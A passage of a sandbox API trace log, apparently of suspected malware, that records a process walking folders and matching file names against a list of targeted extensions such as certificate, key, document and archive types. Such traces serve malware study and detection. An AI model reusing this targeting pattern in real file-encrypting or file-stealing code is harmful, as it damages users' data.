(lpString1=".orf", lpString2=".rtf") returned -1 [0169.080] lstrlenW (lpString=".p12") returned 4 [0169.080] lstrcmpiW (lpString1=".p12", lpString2=".rtf") returned -1 [0169.080] lstrlenW (lpString=".p7b") returned 4 [0169.080] lstrcmpiW (lpString1=".p7b", lpString2=".rtf") returned -1 [0169.080] lstrlenW (lpString=".p7c") returned 4 [0169.080] lstrcmpiW (lpString1=".p7c", lpString2=".rtf") returned -1 [0169.080] lstrlenW (lpString=".pam") returned 4 [0169.080] lstrcmpiW (lpString1=".pam", lpString2=".rtf") returned -1 [0169.080] lstrlenW (lpString=".pbm") returned 4 [0169.080] lstrcmpiW (lpString1=".pbm", lpString2=".rtf") returned -1 [0169.080] lstrlenW (lpString=".pct") returned 4 [0169.081] lstrcmpiW (lpString1=".pct", lpString2=".rtf") returned -1 [0169.081] lstrlenW (lpString=".pcx") returned 4 [0169.081] lstrcmpiW (lpString1=".pcx", lpString2=".rtf") returned -1 [0169.081] lstrlenW (lpString=".pdd") returned 4 [0169.081] lstrcmpiW (lpString1=".pdd", lpString2=".rtf") returned -1 [0169.081] lstrlenW (lpString=".pdf") returned 4 [0169.081] lstrcmpiW (lpString1=".pdf", lpString2=".rtf") returned -1 [0169.081] lstrlenW (lpString=".pdp") returned 4 [0169.081] lstrcmpiW (lpString1=".pdp", lpString2=".rtf") returned -1 [0169.081] lstrlenW (lpString=".pef") returned 4 [0169.081] lstrcmpiW (lpString1=".pef", lpString2=".rtf") returned -1 [0169.081] lstrlenW (lpString=".pem") returned 4 [0169.081] lstrcmpiW (lpString1=".pem", lpString2=".rtf") returned -1 [0169.081] lstrlenW (lpString=".pff") returned 4 [0169.081] lstrcmpiW (lpString1=".pff", lpString2=".rtf") returned -1 [0169.081] lstrlenW (lpString=".pfm") returned 4 [0169.081] lstrcmpiW (lpString1=".pfm", lpString2=".rtf") returned -1 [0169.081] lstrlenW (lpString=".pfx") returned 4 [0169.081] lstrcmpiW (lpString1=".pfx", lpString2=".rtf") returned -1 [0169.081] lstrlenW (lpString=".pgm") returned 4 [0169.081] lstrcmpiW (lpString1=".pgm", lpString2=".rtf") returned -1 [0169.081] lstrlenW (lpString=".php") returned 4 [0169.081] lstrcmpiW (lpString1=".php", lpString2=".rtf") returned -1 [0169.081] lstrlenW (lpString=".php3") returned 5 [0169.081] lstrcmpiW (lpString1=".php3", lpString2="a.rtf") returned -1 [0169.081] lstrlenW (lpString=".php4") returned 5 [0169.081] lstrcmpiW (lpString1=".php4", lpString2="a.rtf") returned -1 [0169.081] lstrlenW (lpString=".php5") returned 5 [0169.081] lstrcmpiW (lpString1=".php5", lpString2="a.rtf") returned -1 [0169.082] lstrlenW (lpString=".phtml") returned 6 [0169.082] lstrcmpiW (lpString1=".phtml", lpString2="la.rtf") returned -1 [0169.082] lstrlenW (lpString=".pict") returned 5 [0169.082] lstrcmpiW (lpString1=".pict", lpString2="a.rtf") returned -1 [0169.082] lstrlenW (lpString=".pl") returned 3 [0169.082] lstrcmpiW (lpString1=".pl", lpString2="rtf") returned -1 [0169.082] lstrlenW (lpString=".pls") returned 4 [0169.082] lstrcmpiW (lpString1=".pls", lpString2=".rtf") returned -1 [0169.082] lstrlenW (lpString=".pm") returned 3 [0169.082] lstrcmpiW (lpString1=".pm", lpString2="rtf") returned -1 [0169.082] lstrlenW (lpString=".png") returned 4 [0169.082] lstrcmpiW (lpString1=".png", lpString2=".rtf") returned -1 [0169.082] lstrlenW (lpString=".pnm") returned 4 [0169.082] lstrcmpiW (lpString1=".pnm", lpString2=".rtf") returned -1 [0169.082] lstrlenW (lpString=".pot") returned 4 [0169.082] lstrcmpiW (lpString1=".pot", lpString2=".rtf") returned -1 [0169.082] lstrlenW (lpString=".potm") returned 5 [0169.082] lstrcmpiW (lpString1=".potm", lpString2="a.rtf") returned -1 [0169.082] lstrlenW (lpString=".potx") returned 5 [0169.082] lstrcmpiW (lpString1=".potx", lpString2="a.rtf") returned -1 [0169.082] lstrlenW (lpString=".ppa") returned 4 [0169.082] lstrcmpiW (lpString1=".ppa", lpString2=".rtf") returned -1 [0169.082] lstrlenW (lpString=".ppam") returned 5 [0169.082] lstrcmpiW (lpString1=".ppam", lpString2="a.rtf") returned -1 [0169.082] lstrlenW (lpString=".ppm") returned 4 [0169.082] lstrcmpiW (lpString1=".ppm", lpString2=".rtf") returned -1 [0169.082] lstrlenW (lpString=".pps") returned 4 [0169.082] lstrcmpiW (lpString1=".pps", lpString2=".rtf") returned -1 [0169.082] lstrlenW (lpString=".ppsm") returned 5 [0169.082] lstrcmpiW (lpString1=".ppsm", lpString2="a.rtf") returned -1 [0169.083] lstrlenW (lpString=".ppt") returned 4 [0169.083] lstrcmpiW (lpString1=".ppt", lpString2=".rtf") returned -1 [0169.083] lstrlenW (lpString=".pptm") returned 5 [0169.083] lstrcmpiW (lpString1=".pptm", lpString2="a.rtf") returned -1 [0169.083] lstrlenW (lpString=".pptx") returned 5 [0169.083] lstrcmpiW (lpString1=".pptx", lpString2="a.rtf") returned -1 [0169.083] lstrlenW (lpString=".prn") returned 4 [0169.083] lstrcmpiW (lpString1=".prn", lpString2=".rtf") returned -1 [0169.083] lstrlenW (lpString=".ps") returned 3 [0169.083] lstrcmpiW (lpString1=".ps", lpString2="rtf") returned -1 [0169.083] lstrlenW (lpString=".psb") returned 4 [0169.083] lstrcmpiW (lpString1=".psb", lpString2=".rtf") returned -1 [0169.083] lstrlenW (lpString=".psd") returned 4 [0169.083] lstrcmpiW (lpString1=".psd", lpString2=".rtf") returned -1 [0169.083] lstrlenW (lpString=".pst") returned 4 [0169.083] lstrcmpiW (lpString1=".pst", lpString2=".rtf") returned -1 [0169.083] lstrlenW (lpString=".ptx") returned 4 [0169.083] lstrcmpiW (lpString1=".ptx", lpString2=".rtf") returned -1 [0169.083] lstrlenW (lpString=".pub") returned 4 [0169.083] lstrcmpiW (lpString1=".pub", lpString2=".rtf") returned -1 [0169.083] lstrlenW (lpString=".pwm") returned 4 [0169.083] lstrcmpiW (lpString1=".pwm", lpString2=".rtf") returned -1 [0169.083] lstrlenW (lpString=".pxr") returned 4 [0169.083] lstrcmpiW (lpString1=".pxr", lpString2=".rtf") returned -1 [0169.083] lstrlenW (lpString=".py") returned 3 [0169.083] lstrcmpiW (lpString1=".py", lpString2="rtf") returned -1 [0169.083] lstrlenW (lpString=".qt") returned 3 [0169.083] lstrcmpiW (lpString1=".qt", lpString2="rtf") returned -1 [0169.083] lstrlenW (lpString=".r3d") returned 4 [0169.084] lstrcmpiW (lpString1=".r3d", lpString2=".rtf") returned -1 [0169.084] lstrlenW (lpString=".raf") returned 4 [0169.084] lstrcmpiW (lpString1=".raf", lpString2=".rtf") returned -1 [0169.084] lstrlenW (lpString=".rar") returned 4 [0169.084] lstrcmpiW (lpString1=".rar", lpString2=".rtf") returned -1 [0169.084] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x1510c, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0169.117] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4b58, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0169.117] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4b58, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0169.117] FindClose (in: hFindFile=0x802098 | out: hFindFile=0x802098) returned 1 [0169.117] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3231230 | out: hHeap=0x710000) returned 1 [0169.117] FindNextFileW (in: hFindFile=0x8025d8, lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1033", cAlternateFileName="")) returned 1 [0169.117] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xfffe) returned 0x3231230 [0169.117] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1033\\*", lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x802318 [0169.118] FindNextFileW (in: hFindFile=0x802318, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0169.118] FindNextFileW (in: hFindFile=0x802318, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd723cc00, ftCreationTime.dwHighDateTime=0x1cabb47, ftLastAccessTime.dwLowDateTime=0xd723cc00, ftLastAccessTime.dwHighDateTime=0x1cabb47, ftLastWriteTime.dwLowDateTime=0xd723cc00, ftLastWriteTime.dwHighDateTime=0x1cabb47, nFileSizeHigh=0x0, nFileSizeLow=0xc74, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0169.119] FindNextFileW (in: hFindFile=0x802318, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x47ad1a00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x47ad1a00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x47ad1a00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12db0, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0169.119] FindNextFileW (in: hFindFile=0x802318, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4358, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0169.119] FindNextFileW (in: hFindFile=0x802318, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4358, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0169.119] FindClose (in: hFindFile=0x802318 | out: hFindFile=0x802318) returned 1 [0169.119] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3231230 | out: hHeap=0x710000) returned 1 [0169.119] FindNextFileW (in: hFindFile=0x8025d8, lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1035", cAlternateFileName="")) returned 1 [0169.119] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xfffe) returned 0x3231230 [0169.120] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1035\\*", lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x802158 [0169.120] FindNextFileW (in: hFindFile=0x802158, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0169.120] FindNextFileW (in: hFindFile=0x802158, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xe76, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0169.120] FindNextFileW (in: hFindFile=0x802158, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12cde, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0169.120] FindNextFileW (in: hFindFile=0x802158, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0169.120] FindNextFileW (in: hFindFile=0x802158, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0169.120] FindClose (in: hFindFile=0x802158 | out: hFindFile=0x802158) returned 1 [0169.121] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3231230 | out: hHeap=0x710000) returned 1 [0169.121] FindNextFileW (in: hFindFile=0x8025d8, lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1036", cAlternateFileName="")) returned 1 [0169.121] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xfffe) returned 0x3231230 [0169.121] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1036\\*", lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8024d8 [0169.122] FindNextFileW (in: hFindFile=0x8024d8, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0169.122] FindNextFileW (in: hFindFile=0x8024d8, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xdc6, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0169.122] FindNextFileW (in: hFindFile=0x8024d8, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x14412, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0169.122] FindNextFileW (in: hFindFile=0x8024d8, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0169.122] FindNextFileW (in: hFindFile=0x8024d8, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0169.122] FindClose (in: hFindFile=0x8024d8 | out: hFindFile=0x8024d8) returned 1 [0169.122] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3231230 | out: hHeap=0x710000) returned 1 [0169.122] FindNextFileW (in: hFindFile=0x8025d8, lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1037", cAlternateFileName="")) returned 1 [0169.123] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xfffe) returned 0x3231230 [0169.123] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1037\\*", lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x802318 [0169.123] FindNextFileW (in: hFindFile=0x802318, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0169.123] FindNextFileW (in: hFindFile=0x802318, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x1ac3, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0169.123] FindNextFileW (in: hFindFile=0x802318, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x1198c, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0169.123] FindNextFileW (in: hFindFile=0x802318, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4158, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0169.123] FindNextFileW (in: hFindFile=0x802318, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4158, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0169.124] FindClose (in: hFindFile=0x802318 | out: hFindFile=0x802318) returned 1 [0169.124] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3231230 | out: hHeap=0x710000) returned 1 [0169.124] FindNextFileW (in: hFindFile=0x8025d8, lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1038", cAlternateFileName="")) returned 1 [0169.124] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xfffe) returned 0x3231230 [0169.124] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1038\\*", lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x802658 [0169.124] FindNextFileW (in: hFindFile=0x802658, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x10, 